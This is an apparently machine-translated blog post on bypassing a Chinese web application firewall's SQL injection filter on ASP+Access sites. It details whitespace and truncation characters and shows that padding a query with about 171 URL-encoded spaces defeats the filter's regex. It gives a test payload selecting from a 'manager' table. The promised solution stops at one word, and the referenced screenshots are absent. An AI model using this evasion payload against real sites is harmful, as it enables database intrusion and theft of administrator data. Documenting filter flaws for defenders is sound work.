Website security dog SQL Injection interception bypass

Website security dog SQL Injection interception bypass

Website security dog SQL Injection interception bypass, website security dog Injection Protection has defects, can be bypassed

For asp + access, first explore the features of the database. 1. The characters that can replace spaces include % 09, % 0A, % 0C, and % 0D,

2. The comments of the following statements can be truncated: % 00, % 16, % 22, and % 27.

Why does % 22 (") and % 27 (') truncate the following statement? Later, I tested that the two characters can be annotated only under special conditions.


However, % 00 and % 16 are not restricted.

Enable the dongle protection function and then test and execute the SQL statement:

We can see that the executed statement is intercepted. The actual test shows that the dongle intercepts select + from, but does not intercept select + xfrom or select + fromx (of course, x is still blocked when it is a special character ).

Dongle matches normal SQL statements, and incorrect statements do not trigger rules. But the statement is wrong. How can we get the desired result? When the dongle intercepts select + from, is the length of the regular expression match infinitely large? Is it possible to construct a very long statement to reach the matching limit, so that the from Statement and the subsequent statement cannot be matched? Perform the following tests with this question: (it is known that the execution of one separator and multiple separators in an SQL statement is the same)
SQL = select (% 09, % 0A, % 0C, or % 0D) * from manager
Sure enough, when % 09, % 0A, % 0C, or % 0D exceeds a certain length, the dongle's defense will become invalid!

In actual testing, the length of the string before from is 49151 (3*2 ^ 14-1 ). When spaces are used, the length will be shorter!

The first 527 characters in from make the defense invalid (171 spaces )! It seems that dongle is especially sensitive to numbers 170 and 49152!
Test statement:
SQL = select % 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 2a % 20 from % 20 manager
170 spaces:

171 spaces:

After the interception is broken, the following statements with keywords will be followed:

Solution:

Filter